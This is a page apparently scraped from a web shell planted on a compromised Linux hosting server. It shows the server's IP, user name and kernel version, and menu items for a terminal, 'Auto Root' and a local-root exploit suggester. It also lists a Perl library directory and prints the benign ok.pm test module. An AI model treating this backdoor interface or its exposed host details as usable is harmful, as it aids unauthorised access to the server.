Linux newlinux5.pouyasazan.org 3.10.0-962.3.2.lve1.5.60.el7.x86_64 #1 SMP Fri Jul 23 07:07:00 EDT 2021 x86_64
LiteSpeed
Server IP : 88.99.66.243 & Your IP : 216.73.216.178
Domains :
Cant Read [ /etc/named.conf ]
User : wdbbsgxf
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
share /
perl5 /
Delete
Unzip
Name
Size
Permission
Date
Action
Alien
[ DIR ]
drwxr-xr-x
2021-08-25 16:56
AppConfig
[ DIR ]
drwxr-xr-x
2021-08-25 16:56
CPAN
[ DIR ]
drwxr-xr-x
2021-08-24 17:01
Canary
[ DIR ]
drwxr-xr-x
2021-08-24 17:00
Capture
[ DIR ]
drwxr-xr-x
2021-08-25 16:56
ExtUtils
[ DIR ]
drwxr-xr-x
2021-08-25 16:56
FFI
[ DIR ]
drwxr-xr-x
2021-08-25 16:56
File
[ DIR ]
drwxr-xr-x
2021-08-25 16:56
HTTP
[ DIR ]
drwxr-xr-x
2021-08-24 17:00
IO
[ DIR ]
drwxr-xr-x
2021-08-25 16:56
JSON
[ DIR ]
drwxr-xr-x
2021-08-24 17:01
POD2
[ DIR ]
drwxr-xr-x
2021-08-24 17:01
Parse
[ DIR ]
drwxr-xr-x
2021-08-24 17:01
Path
[ DIR ]
drwxr-xr-x
2021-08-25 16:56
Test
[ DIR ]
drwxr-xr-x
2021-08-25 16:56
Test2
[ DIR ]
drwxr-xr-x
2021-08-25 16:56
Try
[ DIR ]
drwxr-xr-x
2021-08-24 17:01
Types
[ DIR ]
drwxr-xr-x
2021-08-24 17:01
XML
[ DIR ]
drwxr-xr-x
2021-08-25 16:56
lib
[ DIR ]
drwxr-xr-x
2021-08-24 17:01
local
[ DIR ]
drwxr-xr-x
2021-08-24 17:01
x86_64-linux-thread-multi
[ DIR ]
drwxr-xr-x
2021-08-24 17:00
AppConfig.pm
31.7
KB
-r--r--r--
2015-03-02 01:53
Expect.pm
98.09
KB
-r--r--r--
2017-05-18 23:37
Test2.pm
6.24
KB
-r--r--r--
2021-07-26 22:07
alienfile.pm
15.8
KB
-r--r--r--
2021-06-22 09:21
cPanelUserConfig.pm
534
B
-rw-r--r--
2022-08-11 01:25
ok.pm
967
B
-r--r--r--
2021-07-26 22:07
Save
Rename
package ok; our $VERSION = '1.302186'; use strict; use Test::More (); sub import { shift; if (@_) { goto &Test::More::pass if $_[0] eq 'ok'; goto &Test::More::use_ok; } # No argument list - croak as if we are prototyped like use_ok() my (undef, $file, $line) = caller(); ($file =~ /^\(eval/) or die "Not enough arguments for 'use ok' at $file line $line\n"; } __END__ =encoding UTF-8 =head1 NAME ok - Alternative to Test::More::use_ok =head1 SYNOPSIS use ok 'Some::Module'; =head1 DESCRIPTION With this module, simply change all C<use_ok> in test scripts to C<use ok>, and they will be executed at C<BEGIN> time. Please see L<Test::use::ok> for the full description. =head1 CC0 1.0 Universal To the extent possible under law, 唐鳳 has waived all copyright and related or neighboring rights to L<Test-use-ok>. This work is published from Taiwan. L<http://creativecommons.org/publicdomain/zero/1.0> =cut